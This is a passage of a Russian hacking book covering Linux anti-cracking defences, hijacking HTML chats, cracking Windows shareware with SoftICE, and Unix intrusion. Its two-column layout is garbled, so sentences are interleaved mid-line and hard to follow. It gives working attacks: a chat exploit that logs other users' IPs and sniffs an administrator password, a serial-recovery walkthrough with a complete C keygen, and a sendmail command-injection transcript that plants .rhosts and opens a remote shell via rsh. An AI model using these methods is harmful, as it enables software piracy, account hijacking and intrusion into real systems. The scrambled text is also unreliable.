Защищаем Linux А пока для вас плохие новости — ваша программа обязательно бу дет сломана. Это на самом деле чисто экономический вопрос. Предста Представим, что вы потратили кучу времени и ресурсов, разраба вим, что ваш программный продукт стоит 1000$. Среднемесячная зар тывая последние несколько месяцев неплохую программу, и даже отче плата неплохого программиста из нашей страны едва ли составляет 200$.

го то имеете версию для Linux`а. Видимо, вы хотите окупить затрачен Таким образом, если какой нибудь парнишка из Сибири затратит на ные усилия — проще говоря, заработать на своей программе кучу денег.

слом вашего творения меньше 5 месяцев — он будет экономически выго И если вы не опубликовали свой исходный код, в надежде заработать ден. Заметьте, что здесь ни слова не было сказано ни об операционной другими способами, то необходимо как то защитить вашу программу от системе, под которой работает ваш шедевр, ни о сложности и стоимости несанкционированного копирования. Т.е. программа должна работать использованной системы защиты.

только у того, кто ее купил, и не должна работать (или работать непра вильно, или, что бывает чаще всего, иметь функциональные ограниче Что же делать — идти в монастырь (хотя в женский иногда наве ния) у халявщиков и крякеров. Проще говоря, чтобы ваш уникальный дываться — наверное, неплохая идея)? Вы должны рассматривать защи алгоритм не смогли своровать.

ту своего программного продукта не как 100% средство от ваших голов ных болей, а всего лишь как средство, затрудняющее жизнь крякеру.

Если разработке/снятию защит под DOS/Windows посвящено Скажем, если ваша защита остановит 9 крякеров из 10 — это очень не множество сайтов, то практически невозможно найти ни одной работы, плохой результат. Конечно, не все 9 остановленных купят вашу про посвященной тому же самому, но под Linux. Между тем уже имеется грамму, но их будет явно больше, чем для случая, когда ваша защита множество коммерческих программ под эту, в общем, не самую плохую сломана 9 ю из 10.

из распространенных, OS. С прискорбием заметим, что вся их «защита» составляет максимум 1% от их Windows аналогов и снимается в худшем Итак, довольно пустых разговоров. Для начала сделаем краткий случае за пару часов.

обзор применяемых крякерами инструментов (хотя вполне возможно рассматривать Linux как один большой инструмент крякера).

Постараемся объяснить, почему происходит именно так, почему под Linux`ом не работают многие традиционно используемые для защи Отладчики ты Windows программ способы, и, возможно, после прочтения этой гла вы вы сможете придумать что то действительно эффективное.

GDB Итак, в чем же главное отличие Linux от прочих OS? В доступно Отладчик userlevel mode. Загружает файлы с помощью BFD.

сти исходного кода всего (ну, кроме, разве что, вашей программы, стоя Что то вроде старого недоброго debug из DOSа. Также оформлен как щей мегабаксы), что работает (или не работает) на вашей машине. Это библиотека. К нему есть множество интерфейсов, наиболее удобный для делает написание защиты под Linux просто кошмаром — вы не можете X Windows, IMHO, DDD (требует LessTif). Также заслуживает отдельно быть уверены, что функция strcmp из стандартной run time library — это го упоминания SmartGDB. Крайне интересная идея прибить сбоку от действительно strcmp, а не ее измененный (обычно не в вашу пользу) ладчика script engine. Вещь очень любопытная с точки зрения автомати эмулятор.

зации труда крякера — вы можете написать script, который посадить затем как триггер на точку останова. Ваш script смог бы, например, про Вы не можете доверять ничему в такой операционной системе — верить переменные в отлаживаемой программе, и в зависимости от их вследствие доступности исходного кода любая ее часть может быть мо значения, например, поставить новую точку останова (с новым scriptом), дифицирована крякером для взлома вашей программы, включая такие сбросить кусок памяти в файл, сварить какаву...

важнейшие компоненты, как ядро и run time library. Ваша программа работает в самой агрессивной среде, какую только можно себе предста Kernal level debugger вить. В самом деле, если бы вы могли изменить в Windows 9x, скажем, от все той же SGI. Пока крайне сырая вещь (и требует нестабиль kernel32.dll (имеется в виду не ковыряние в машинном коде с помощью ной версии кернела), но может служить прототипом для более пригод дизассемблера, хотя возможно использовать и такой метод — нет, про ных к использованию изделий.

Хакерские трюки 229 230 Хакерские трюки Дизассемблеры Стандартные средства разработки Без сомнения, IDA Pro. Также иногда можно на скорую руку ис Для модификации ядра/runtime библиотек (а также для создания пользовать Biew, objdump (или даже ndisasm, дизассемблер от Netwide patch`ей и keygen`ов) нужен как минимум компилятор «C».

Assembler), но это несерьезно. Более неизвестны инструменты, которые позволяют дописывать к ним новые процессорные модули, загрузчики Способы защиты для нестандартных форматов файлов, а также plugins, облегчающие авто Итак, надеемся, вы еще не уснули и не впали в депрессию. Что же матический/интерактивный анализ.

можно противопоставить всему вышеописанному ? Явно годятся далеко не все методы, используемые в Win32. Тем не менее, представим не strace сколько...

или truss под UnixWare. Аналог regmon/filemon/BoundsChecker в одном флаконе. Ядро Linux`а имеет поддержку перехвата системных Против BFD (GDB, objdump, strings и т.д.) вызовов (функция ptrace). Т.е. можно запустить любой процесс как под BFD — это библиотека для манипуляций с бинарными файлами.

лежащий трассировке через ptrace, и вы сможете отследить все систем По счастливому стечению обстоятельств она используется также отлад ные вызовы с их параметрами. Более того, после небольшой модифика чиком GDB. Но для ELF формата (наиболее распространенный формат ции эта функция (которая имеет доступ к виртуальной памяти исполнимых файлов под всеми современными Unix`ами) она реализует трассируемого процесса) может быть использована, например, для неправильный алгоритм загрузки. Для этого можно использовать sstrip run time patching, внедрения кода в адресное пространство любого про или ELF.compact (собственно, они делают одно и то же).

цесса, и так далее, и тому подобное.

Преимущества:

ptrace Очень простой метод. Берете вашу готовую отлаженную програм Менее надежное, но более простое в реализации средство. Можно му и вместо команды strip запускаете elf_compact (или sstrip).

вызвать ptrace для самого себя. Если вызов был неудачен — значит, нас уже трассируют, нужно сделать что нибудь по этому поводу (sys_exit, на Помимо всего прочего, вы уменьшите размер вашего дистрибути пример). Впрочем, ведь если нас уже трассируют, ничего не стоит пере ва. Хотя, глядя на размеры современных дистрибутивов Linux`а, этот ар хватить данный вызов и вернуть все что угодно... гумент кажется просто смешным... на этом преимущества заканчивают ся и начинаются… Memory dumpers Сплошные недостатки:

Файловая система /proc может использоваться для таких целей.

Файл maps используется как карта выделенной процессу виртуальной Поскольку исходники BFD публично доступны, теоретически лю памяти, а файл mem является ее отображением, можно сделать в нем seek бой может доработать этот замечательный пакет, так что шансы снова на нужный адрес и легко сохранить необходимый участок в файл или ку будут не в вашу пользу. Собственно, вы должны помнить, что в Linux`е да вы там хотите. Простая программа на Perl размером 30 строчек мо это относится ко всему. Но пока этот метод работает.

жет быть использована для снятия дампа памяти вашей драгоценной Данный вариант может рассматриваться как очень простая защи программы и сохранения ее в файл. Намного проще, чем под Win32.

та от полных ламеров, rating 0.1%.

Шестнадцатеричные редакторы Компрессия/шифрование кода программы С этим тоже никогда не было больших проблем. Даже стандарт Самый распространенный метод защиты под Win32. Под Linux`ом ный просмотровщик Midnight (или Mortal, его второе имя) Comanderа этот метод имеет некоторые особенности. Самое большое отличие в том, умеет редактировать в шестнадцатеричном представлении. Для гурманов как разрешаются ссылки на внешние модули.

рекомендуем Biew.

Хакерские трюки 231 232 Хакерские трюки Статическая линковка си. Таким образом, разделение сегментов кода между процессами воз можно только между родителем и его потомками (как результат функции Не имеющий аналогов под Win32 метод. При сборке программы fork). Эти же аргументы применимы и к утверждению, что якобы «упа все используемые ею библиотеки просто статически линкуются в один ковка кода программы приводит к увеличению ресурсов, необходимых большой толстый модуль. Т.е. для запуска такой программы ничего до для запуска такой программы».

полнительно делать не нужно — такая программа самодостаточна.

Преимущества:

Динамическая линковка Под Win32 все программы являются динамически слинкованны Большую программу ломать труднее, чем маленькую.

ми как минимум с системными.DLL, реализующими API. Более того, Независимость от среды исполнения. В самом деле, довольно час такая линковка осуществляется опять же самой системой с помощью все то возникают конфликты версий, установленных на машине конечного тех же функций API. Под Linux`ом все по другому. Во первых, програм пользователя библиотек, из за чего ваша программа может просто не ра ме совершенно не обязательно быть динамически слинкованной.

ботать. В случае статически слинкованной программы такие проблемы Во вторых, программа сама должна заботиться о загрузке всех необходи устраняются (а точнее, просто не возникают).

мых модулей и динамическом разрешении ссылок. Это, правда, вовсе не означает, что вам каждый раз придется писать код загрузки модуля в па Устранение (хотя и не 100%) возможности перехвата и эмуляции мять. Среда исполнения (а не kernal — как в Win32) предоставляет реали библиотечных вызовов. В такой программе вы будете несколько более зацию динамического загрузчика по умолчанию — в терминах Linux его уверены, что при вызове, скажем, strcmp будет вызвана ваша статически называют ELF interpretor, или просто interpretor. При линковке в про слинкованная функция strcmp, а не неизвестно что. Хотя в Linux никогда грамму помещается информация, что для ее запуска необходимо после и ни в чем нельзя быть уверенным до конца.

загрузки самой программы также загрузить interpretor и передать ему уп Недостатки:

равление. На этом загрузка файла на исполнение с точки зрения кернела заканчивается. Но ваши головные боли только начинаются! Итак, чем Увеличение размера программ.

плох стандартный ELF interpretor?

Если вы думаете, что таким образом сможете затруднить жизнь Тем же, чем и весь Linux, — его исходники доступны, соответ крякеру, вы глубоко ошибаетесь. С помощью технологии FLAIR, ис ственно, он может быть легко изменен для достижения неизвестных вам пользуемой в IDA Pro, а также применив инструмент RPat для создания целей.

сигнатур исходных библиотек (использованных вами при статической линковке), все ваши библиотечные функции могут быть легко опознаны.

Он поддерживает уникальный для Unix`ов механизм предвари Более того, обычно не составляет большого труда выяснить, какие имен тельной загрузки. Рассмотрим его подробнее. Итак, предположим, что но библиотеки используются, собрать их и сделать файлы сигнатур.

ваша программа импортирует функцию strcmp. Злобный крякер может Rating: 0.1%.

написать собственную реализацию этой функции, создать объектный модуль и использовать ее вместо той, что вы ожидали! Для этого всего Возможно, что кто нибудь станет утверждать, что статическая лишь нужно определить переменную среды LD_PRELOAD, чтобы она линковка де увеличивает необходимые ресурсы и что якобы разделя содержала список модулей, подлежащих загрузке перед модулями, им емые библиотеки разделяют сегмент кода между всеми процессами, ис портируемыми вашей программой. Логика работы interpretor`а такова, пользующими их. То же самое утверждает большинство учебников по что если некая импортируемая функция уже разрешена, то она больше не Unix, но это не так. Самое простое доказательство — просмотр атрибутов разрешается (в Linux импорт происходит по имени, а не по имени и име сегментов памяти, занимаемых разделяемыми библиотеками (файл maps ни библиотеки, как в Win32). Таким образом, можно штатными сред в файловой системе /proc). Вы почти никогда не увидите атрибута ствами внедрить в адресное пространство вашей программы все, что s(hared). Почему? Короткий ответ звучит так — из за ELF. Дело в том, угодно, заменив при этом любую импортируемую функцию. Похоже на что при загрузке ELF файла происходит настройка его перемещаемых ночной кошмар, не так ли? Вы все еще думаете, что Linux написали не адресов — relocations. При этом сегменту памяти (даже если это сегмент крякеры?

кода) присваиваются атрибуты Read/Write и если он при этом разделял ся несколькими процессами, происходит копирование памяти при запи Хакерские трюки 233 234 Хакерские трюки С стандартным interpretor`ом есть и еще одна проблема. Дело Глава 20.

в том, что его легко можно переписать для универсального инструмента, Взлом html чатов отслеживающего все вызовы импортируемых функций. Была идея встро ить script engine в ELF interpretor, так что больше не нужно будет перепи Предполагается, что читатель знает, что такое CGI, и на этом мы сывать его под каждую конкретную программу, а всего лишь заменить построим свое объяснение.

script, который и сделает все, что нужно. Ведь ELF interpretor работает в адресном пространстве вашей программы, и он отвечает за начальную В любом чате фрейм, в котором вы пишете сообщения, генерится загрузку импортируемых функций, т.е. фактически такой script будет динамически (для каждого входящего) и, возможно, содержит несколько иметь над вашей программой полный контроль (под Win32 вообще неиз скрытых полей. Типа вестны подобные инструменты. BoundsChecker, конечно, может отсле (так хранится UserID).

живать все вызовы импортируемых функций, но пока никому не пришла Идея в следующем: сохраняем содержимое этого фрейма на диске мысль дописать к нему script engine и использовать, например, для mem и исправляем его так, чтобы можно было с ним работать со своего винта.

ory patching).

Т.е. заменяем ссылки типа /cgi bin/refresh.pl на полный путь Если после прочтения предыдущего абзаца вы все еще не выбро www.chat.nsk.su/cgi bin/refresh.pl и вместо скрытых полей формы пишем сились из окна — есть для вас и хорошие мысли. Итак, что могут проти типа (что бы можно было вопоставить авторы защиты? Собственный загрузчик в кернеле. Можно их изменять) После этого делаем HTML документ для «сборки чата» из просто переписать стандартный загрузчик ELF файлов (файл кусков. Т.е. примерно так:

binfmt_elf.c из директории fs исходников ядра Linux), чтобы сделать "First.htm" жизнь крякера несколько тяжелее. Например, сбрасывать флаг трасси ровки процесса, иметь собственный формат исполнимых файлов (есте ственно, вместе с перекодировщиком обычных ELFов в этот формат), декриптовать/декомпрессировать куски файла перед загрузкой их в па является необходимость иметь собственный код в kernel`е. Поскольку у конечного пользователя, что вполне естественно, время от времени воз никает необходимость в пересборке кернела, вы должны будете предо ставить либо объектный модуль (для насмерть прибитого гвоздями в кер нел кода), или опять объектный модуль (для LKM — Linux Kernal Module). И то, и другое легко можно дизассемблировать/пропатчить, Start.htm — это и есть тот фрейм, который мы сохранили и изме и история повторяется...

нили.

Как насчет смены версии кернела? Например, грядет смена ядра После этого просто браузером открываем страницу (First.htm).

2.2 на 2.4 — нужно будет иметь (и поддерживать!) как минимум код для И сразу(!!!) попадаем в чат, минуя стандартную процедуру входа.

обеих версий ядра...

Это позволит:

А если вы допустите ошибку? Если для userlevel программ ваши ошибки, скорее всего, не смертельны, то ошибки в коде кернела могут 1. Обходить зарегистрированные имена.

иметь весьма плачевные последствия. Кроме того, отладка такого кода 2. Прятать свой IP от киллеров за счет взятия чужого ID'a.

является сущим кошмаром, поверьте… Дальше интересно вычислить IP участников. Если не запрещен Субъективная причина — сложность установки. Но при всех недо тэг , то это позволит вставлять в свое сообщение ресурс статках — это вполне приемлемый вариант.

со своей машины. Сам по себе звук не нужен, но этот косяк позволил вставить в свой месс строку типа . Этот скрипт (spy.exe) вызывался с машины каждого участника Глава 21.

чата. Это позволит увидеть IP всех (скрипт просто сохраняет на винт дан Как ломать приложения Windows ные из переменной окружения REMOTE_ADDR). Примерно в это же время в чате появились приваты. Это значит, что документ в главном фрейме (тот, где мессы все) стал называться по другому.

Введение До приватов:

Ломать программы Windows в большинстве случаев даже проще, чем ломать программы DOS. В Windows сложно что нибудь скрыть от то http://www.chat.nsk.su/cgi bin/refresh.cgi?win+razgovor#end го, кто ищет, особенно если программа использует стандартные функ После появления приватов:

ции Windows.

http://www.chat.nsk.su/cgi Первая (и часто единственная) вещь, которая вам потребуется, — bin/refresh.cgi?win+razgovor+SP345678#end это SoftICE/Win 2.oo, мощный отладчик от фирмы NuMega.

Где SP456789 — UserID.

После этого в скрипт (spy.exe) был добавлен вывод ID'a из пере Обзор SoftICE/WIN 2. менной окружения HTTP_REFERER. Ну, а сопоставить ник с ID'ом не Ниже приведен состав окна SoftICE:

проблема, т.к. ID каждого прописан там же примерно в такой строке
Тут ник Регистры R — правка значения регистров.

Окно данных (Эта строка взята из правого фрейма, где можно вызвать функцию D — просмотр памяти.

«Кто в чате»).

E — правка памяти.

После этого перестало быть проблемой сопоставление ника и IP.

Затем можно позабавиться с приватами.

Окно кода Используя метод сохранения странички на винт, можно получить U — просмотр кода по адресу.

форму для отправления приватов от кого то кому то. Т.е. можно в отсы A — вставка кода.

лаемом приватно сообщении проставлять имя отправителя.

Осталось только одно. Известно, что в чате есть киллеры, но ниче Окно команд го не известно про то, что это, где это, как это. Известно только, что для Здесь вы набираете команды.

того, чтобы киллерствовать, надо зайти на какую то страничку. Очевид Другие важные клавиши (в стандартной настройке):

но, что в этой киллерской страничке показываются имена. Предполо жим, что имя показывается таким, каким его вводить. Исходя из этого, H/F1 — помощь;

под именем MyNick зашел в F5/Ctrl+D — запуск программы (или продолжение прерванной чат (через прокси) и начал легонько ругаться (надо было, чтобы киллеры программы);

зашли на свою страничку). После этого, изучив лог нашего ВебСервера (OmniHTTPd beta), можно увидеть там обращение со страницы, не отно F8 — пошаговая отладка с заходом в тело функции;

сящейся к известным нам страницам чата. Лезем на эту страницу и полу F10 — пошаговая отладка без захода в тело функции;

чаем запрос на ввод пароля, со словами «Дорогой администратор...». Это приятно греет душу. Дальше можно подобрать пароль или еще что при F11 — выйти из функции (будет работать только до первого PUSH думать. Но ситуация сложилась так, что мы оказались в одной сети с кил в функции).

лером, и, запустив сниффер, мы получаем пароль.

Хакерские трюки 237 238 Хакерские трюки В командной строке SoftICE наберите следующее:

Поиск регистрационных кодов :bpx getwindowtexta Возможно, наилучший способ попрактиковаться — это найти где нибудь shareware программку и попытаться зарегистрировать ее.

Если вы получите сообщение об ошибке (например, «No LDT»), убедитесь, что в фоне у вас не выполняются никакие другие приложения.

Task Lock 3. Как правило, Norton Commander в фоне является причиной подобного Простая защита на основе серийного номера: номер не зависит ни поведения SoftICE.

от каких факторов.

Вы можете проверить наличие брейкпойнтов командой:

Регистрация заключается в заполнении регистрационного номера :bl в диалоговом окошке, которое появляется, когда вы выбираете меню В результате вы увидите что нибудь типа:

«Register Register...». Существует два типа регистрации: для индивиду ального использования и для использования в «конторе» (в оригинале — 00) BPX USER32!GetWindowTextA C= site license). Поэтому очень вероятно, что в программе будет две провер Чтобы выйти из отладчика, нажмите Ctrl D (или F5) еще раз.

ки регистрационных кодов.

Продолжим... Итак, вы установили брейкпойнт, и теперь SoftICE Регистрационные коды чаще всего вводятся в обычных строчках будет «выскакивать» при каждом вызове функции GetWindowTextA. По ввода типа Windows Edit. Чтобы проверить код, программа должна про пробуем ввести какое нибудь значение в окне регистрации и нажмем читать содержимое строки ввода при помощи одной из функций:

OK. Вы нажимаете OK...

16 бит...и получаете дурацкое сообщение о том, что ваш код был непра GetWindowText вильным.

GetDlgItemText Значит, это была не функция GetWindowTextA... Попробуем 32 бит GetDlgItemTextA.

GetWindowTextA, GetWindowTextW Удалим старый брейкпойнт:

GetDlgItemTextA, GetDlgItemTextW :bc Последняя буква в названии 32 битных функций говорит о том, (0 — это номер брейкпойнта в списке брейкпойнтов).

какие строки использует эта функция: однобайтовые или двухбайтовые.

Двухбайтовые строки используются очень редко.

И установим новый:

Возможно, что вы уже уловили мысль, что «Если бы можно было :bpx getdlgitemtexta прерваться по вызову GetWindowText...» — и вы можете это сделать!!! Но Ну что ж, попробуем еще раз...

сперва вы должны убедиться, что символьные имена (имена функций) Wow! Работает! Теперь вы в SoftICE, в самом начале функции загружены SoftICE'ом.

GetDlgItemTextA. Чтобы попасть туда, откуда она была вызвана, нажми Чтобы установить «ловушку» (на самом деле это называется точ те F11. Теперь вы внутри модуля SGLSET.EXE. Если вы не уверены — кой останова, или брейкпойнтом) в SoftICE, вы должны зайти в отладчик посмотрите на строчку между окном кода и окном командной строки, нажатием клавиш Ctrl D и использовать команду BPX. В качестве пара она должна выглядеть так:

метра команды можно использовать либо имя функции, либо непосред —————SGLSET!.text+1B13————— ственно адрес. Так как наш «объект изучения» (Task Lock) является Сейчас вы уже можете запретить реакцию на вызов функции:

32 битным приложением, мы должны поставить брейкпойнт на функ цию GetWindowTextA. Если это не поможет, попробуйте поставить :bd брейкпойнт на другие функции.

Если вам вдруг захочется снова разрешить ее, наберите:

:be Хакерские трюки 239 240 Хакерские трюки Первая строка в окне кода выглядит так: Это выглядит как вызов функции сравнения двух строк. Она рабо тает так: на входе — две строки, на выходе — 0, если они равны, и любое CALL [USER32!GetDlgItemTextA] другое значение, если не равны.

Чтобы посмотреть строчки над ней, нажимайте Ctrl+Up («стрелка вверх») до тех пор, пока не увидите нижеприведенный кусок кода. Если А зачем программе сравнивать какую то строчку с той, что вы вве вы ничего не понимаете в Ассемблере, ознакомьтесь с комментариями, ли в окне диалога? Да затем, чтобы проверить правильность вашей стро которые могут вам помочь. ки (как вы, возможно, уже догадались)! Так так, значит, этот номер скрывался по адресу [EBP+FFFFFF64]? SoftICE не совсем корректно ра RET ;

Конец функции ботает с отрицательными числами, и поэтому настоящий адрес следует PUSH EBP ;

Начало другой функции посчитать:

MOV EBP, ESP ;

...

SUB ESP, 0000009C ;

... 100000000 — FFFFFF64 = 9C PUSH ESI ;

...

Вы можете сделать это вычисление прямо в SoftICE:

> LEA EAX, [EBP 34] ;

EAX = EBP :? 0 FFFFFF PUSH EDI ;

...

Число 100 000 000 слишком велико для SoftICE, а вычитание из MOVE ESI, ECX ;

...

дает тот же самый результат.

PUSH 32 ;

Макс. длина строки > PUSH EAX ;

Адрес текстового буфера Наконец пришло время взглянуть, что же скрывается по адресу PUSH 000003F4 ;

Идентификатор управления EBP 9C...

PUSH DWORD PTR [ESI+1C] ;

Идентификатор окна диалога :d ebp 9c CALL [USER32!GetDlgItemTextA] ;

Получить текст В окне данных SoftICE вы видите длинную строчку цифр — это се Команды PUSH означают сохранение значений для последующе рийный номер!

го использования.

Но вы помните, что было сказано раньше? Два типа регистра Важные строчки помечены символом «>». Глядя на этот код, мы ции — два разных серийных номера. Поэтому после того, как вы записа видим, что адрес текстового буфера хранился в регистре EAX и что EAX ли на бумажечку первый серийный номер, продолжайте трассировать был EBP 34h.

программу при помощи F10. Мы дошли до следующего куска кода:

Поэтому нам стоит взглянуть на EBP 34h:

> LEA EAX, [EBP 68] ;

EAX = EBP :d ebp LEA ECX, [EBP 34] ;

ECX = EBP PUSH EAX ;

Сохраняет EAX Вы должны были увидеть текст, который вы ввели в диалоговом PUSH ECX ;

Сохраняет ECX окне. Теперь мы должны найти место, где ваш номер сравнивается с ре > CALL 00403DD0 ;

Снова вызывает функцию альным серийным номером.

ADD ESP, 08 ;

Удаляет сохраненную информацию Поэтому мы пошагово трассируем программу при помощи F10 до TEST EAX, EAX ;

Проверяет значение функции тех пор, пока не встретим что нибудь о EBP 34. Не пройдет и нескольких JNZ 00402BFF ;

Прыгает если не «ноль» секунд, как вы наткнетесь на следующий код:

И что вы видите по адресу EBP 68? Второй серийный номер!

> LEA EAX, [EBP+FFFFFF64] ;

EAX = EBP 9C :d ebp LEA ECX, [EBP 34] ;

ECX = EBP Вот и все... Надеемся, что у вас все получится!

PUSH EAX ;

Сохраняет EAX PUSH ECX ;

Сохраняет ECX Command Line > CALL 00403DD0 ;

Вызывает функцию Программа легкой регистрации «имя код» и создания генератора ADD ESP, 08 ;

Удаляет сохраненную информацию ключей — хороший пример, с легким алгоритмом генерации кода.

TEST EAX, EAX ;

Проверяет значение функции JNZ 00402BC0 ;

Прыгает, если не «ноль» Хакерские трюки 241 242 Хакерские трюки Вы осмотрели программу и увидели, что это 32 битное приложе А что такое шестнадцатеричное 3039? Наберем:

ние, требующее имя и код в окне регистрации. Поехали!

:? Мы поступаем так же, как и с Task Lock'ом — ставим брейкпойн И получим следующее:

ты. Можно даже поставить сразу два брейкпойнта на наиболее возмож 00003039 0000012345 «09» ные функции: GetWindowTextA и GetDlgItemTextA. Нажмите Ctrl D, ^ hex ^ dec ^ ascii чтобы вызвать отладчик и наберите в окне команд:

Как вы видите (и, возможно, уже догадались), это код, который вы :bpx getwindowtexta ввели в диалоговом окне. OК, что теперь? Посмотрим дальше:

:bpx getdlgitemtexta MOV [0040A548], EAX ;

Сохраняет рег. код Теперь возвращайтесь в прерванную программу, идите в окно ре MOV EDX, EAX ;

А также помещает его в EDX гистрации и вводите имя и какой нибудь номер (обыкновенное целое Мы достигли места, где подсчитывается реальный регистрацион число — это наиболее вероятный код). Можно написать, например:

ный код!

Name: ED!SON ' MOV ECX, FFFFFFFF ;

Эти строчки подсчитывают Code: SUB EAX, EAX ;

длину строки Программа остановилась на GetDlgItemTextA. Так же, как и в слу REPNZ SCASB ;

.

чае с Task Lock'ом, мы нажимаем F11 чтобы вернуться в вызывающую NOT ECX ;

.

функцию. Просматриваем окно кода при помощи Ctrl+Up. Вызов функ DEC ECX ;

ECX теперь содержит длину ции выглядит так:

MOVSX EAX, BYTE PTR [0040A680] ;

Получает байт по адр. 40A680h MOV ESI, [ESP+0C] IMUL ECX, EAX ;

ECX = ECX * EAX PUSH 1E ;

Максимальная длина SHL ECX, 0A ;

Сдвиг влево на 0Ah бит PUSH 0040A680 ;

Адрес буфера ADD ECX, 0002F8CC ;

Добавляет 2F8CC к результату PUSH 000003ED ;

Идентификатор управления MOV [0040A664], ECX PUSH ESI ;

Идентификатор окна диалога...И где он проверяется CALL [User32!GetDlgItemTextA] CMP ECX, EDX ;

Сравнивает числа Число 40A680 кажется нам интересным, поэтому мы проверяем JZ 00402DA6 ;

Прыгает, если равны этот адрес:

Когда вы дотрассировали до сравнения чисел, вы можете посмот :d 40a реть, каким должен был быть ваш реальный регистрационный код:

Что же видно в окне данных, как не имя, которое мы ввели? А те :? ecx перь взглянем на кусок кода под вышеприведенным:

В нашем случае это дало:

PUSH 00 ;

(не интересно) 000DC0CC PUSH 00 ;

(не интересно) То есть, правильный код для нас: 901324.

PUSH 000003F6 ;

Идентификатор управления MOV EDI, 0040A680 ;

Адрес буфера Нажмем F5 или Ctrl D, чтобы вернуться в программу, и попробу PUSH ESI ;

Идентификатор окна диалога ем еще раз, но на этот раз с правильным кодом (в десятичной форме). Ра CALL [User32!GetDlgItemInt] ботает!

Функция GetDlgItemInt похожа на GetDlgItemTextA, но возвра щает не строку, а целое число. Она возвращает его в регистре EAX, по Создание генератора ключей этому мы трассируем этот код (F10) и смотрим, что же у нас появилось для Command Line в окне регистров после вызова функции... Оно выглядит так:

Взглянем на алгоритм генерации кода и попробуем перевести его EAX= на язык Си.

Хакерские трюки 243 244 Хакерские трюки Вот очень простая формула, по которой подсчитывается ключ: в верхушку стека, и затем вызываемая функция проверяет, что лежит в стеке, и использует эти данные по своему усмотрению.

code = ((uppercase_first_char * length_of_string) << 0x0A) + 0x2f8cc;

О программах на VISUAL BASIC Замечание 1: Не следует забывать, что все символы в окне ввода EXE файлы, производимые Visual Basic'ом, не являются настоя имени были приведены к верхнему регистру, поэтому мы должны сде щими EXE. Они просто содержат код для вызова VBRUNxxx.DLL, кото лать то же.

рый затем читает данные из EXE и выполняет программу. Такое устрой Замечание 2: << 0x0A означает умножние на 2 в степени 10.

ство псевдо EXE файлов является также причиной того, что программы на Visual Basic'е такие медленные.

Целиком программа на Си выглядит так:

#include А так как EXE файлы не являются настоящими EXE файлами, вы #include не можете трассировать и дизассемблировать их — вы найдете вызов int main() функции из DLL и кучу мусора. И когда вы будете трассировать такую { программу, вы «заблудитесь» в DLL.

unsigned long code;

Решением этой проблемы является декомпилятор. Существует де unsigned char buffer[0x1e];

компилятор для программ, написанных на Visual Basic'е версий 2 и 3, со printf(«CommandLine95 Keymaker by ED!SON '96\n»);

зданный кем то, называющим себя DoDi.

printf(«Enter name: «);

gets(buffer);

Как в SoftICE загружать символьные имена strupr(buffer);

code = ( ((unsigned long)buffer[0] * Чтобы проверить, загрузил ли SoftICE символьные имена (unsigned long)strlen(buffer)) GetWindowText, вы должны войти в отладчик нажатием на клавиши << 0x0A) + 0x2f8cc;

Ctrl D и в окне команд ввести следующее:

printf(«Your code is: %lu», code);

:exp getwindowtext return 0;

Если вы не получили списка всех функций GetWindowText, вам } нужно отредактировать файл \SIW95\WINICE.DAT, удалив символ ком ментария (';

') перед одной из строчек 'exp=', которые следуют за текстом:

Как работают PUSH и CALL, «Examples of export symbols that can be included for chicago» в конце этого когда программа вызывает функцию файла.

Снова взглянем на кусок кода из Task Lock'а:

Вы можете удалить комментарии из всех строчек 'exp=' или сохра PUSH 32 ;

Макс. длина строки нить немножко памяти, раскомментировав только строчки с файлами PUSH EAX ;

Адрес текстового буфера kernel32.dll, user32.dll и gdi32.dll, которые являются самыми важными.

PUSH 000003F4 ;

Идентификатор управления После этого вы должны перегрузить компьютер.

PUSH DWORD PTR [ESI+1C] ;

Идентификатор окна диалога CALL [USER32!GetDlgItemTextA] ;

Получает текст Синтаксис некоторых функций Когда вы вызываете функцию GetDlgItemTextA из программы Вам будет легче понять, как вызываются функции, о которых мы на C, вызов выглядит так:

говорили, если вы будете знать их описания (декларации):

GetDlgItemTextA(hwndDlg, 0x3F4, buffer, 0x32);

int GetWindowText(int windowhandle, char *buffer, int maxlen);

^ [ESI+1C] ^ EAX int GetDlgItemText(int dialoghandle, int controlid, char *buffer, PUSH сохраняет данные в области памяти, называемой стеком.

int maxlen);

В результате каждого PUSH'а новый кусок данных помещается int GetDlgItemInt(int dialoghandle, int controlid, int *flag, int type);

Хакерские трюки 245 246 Хакерские трюки ! версия, которая, как известно, содержит ошибку.

Глава 22.

helo xxx Несанкционированный доступ: примеры 220 Helo xxx, ( crack.edu ) mail from: |echo crack.edu/.rhosts@target.remote.com вторжения ! подставляем команду вместо обратного адреса.

200 Sender ok.

Повышение интереса к TCP/IP сетям обусловлено бурным ростом rcpt to: nosuchuser сети Internet. Однако это заставляет задуматься над тем, как защитить ! вводим заранее неправильного адресата свои информационные ресурсы и компьютеры от различного рода зло 500 nosuchuser: user unknown умышленников. Для того, чтобы разработать реально действующие ! несмотря на сообщение, продолжаем диалог.

контрмеры, необходимо знать способы и методы взломщиков. В миро data вом сообществе Internet уже давно ведется дискуссия о том, публиковать 230 Enter mail, end with.

или не публиковать материалы о методах проникновения в чужие ком 200 Mail accepted пьютерные сети. После жарких обсуждений, похоже, была осознана не ! все, машина взломана....

обходимость полной открытости по этому вопросу. Этот материал осно quit ван на опыте администрирования сети при постоянных попытках взлома crack% su и методических указаниях CERT. Его задача состоит в том, чтобы обра ! А теперь залезаем так, чтобы нас не было видно через who тить внимание администраторов сетей, подключенных к Internet, на оче # rsh target.remote.com /bin/csh i видные бреши в системе безопасности наиболее популярных систем.

Welcome to remote.com!

Кроме примеров взломов и возможных дыр, постараемся кратко описать Warning! No access to terminal, job control disabled!

основные средства борьбы с этим неизбежным злом. Учитывая тот факт, target# что большинство серверов на сети использует операционную систему Эта ошибка присутствует в нескольких десятках различных вари Unix, обзор возможных прорех в системе безопасности имеет смысл на антов ОС Unix самых разных фирм.

чать именно с этой ОС.

Кроме того, существуют и более простые способы при благопри Основные методы получения ятных условиях: удаленная машина Sun, система SunOS 4, NIS не запу щен, система поставлена, и ничего не исправлялось, например:

несанкционированного доступа к Unix через сеть Начать обзор следует с возможности взлома через электронную crack# su — bin почту. Для пересылки электронной почты по IP на подавляющем боль $ rsh target.remote.com /bin/csh i шинстве систем используется программа sendmail, разработанная в уни ! В файле /etc/hosts.equiv есть запись + и ошибка...

верситете Беркли. Задуманная как чисто служебная утилита, эта про Welcome to remote.com!

грамма приобрела огромную популярность и вошла в состав ! Каталог /etc с владельцем bin...

дистрибутива многих Unix систем. Однако она содержала в себе очень Warning! No access to terminal, job control disabled!

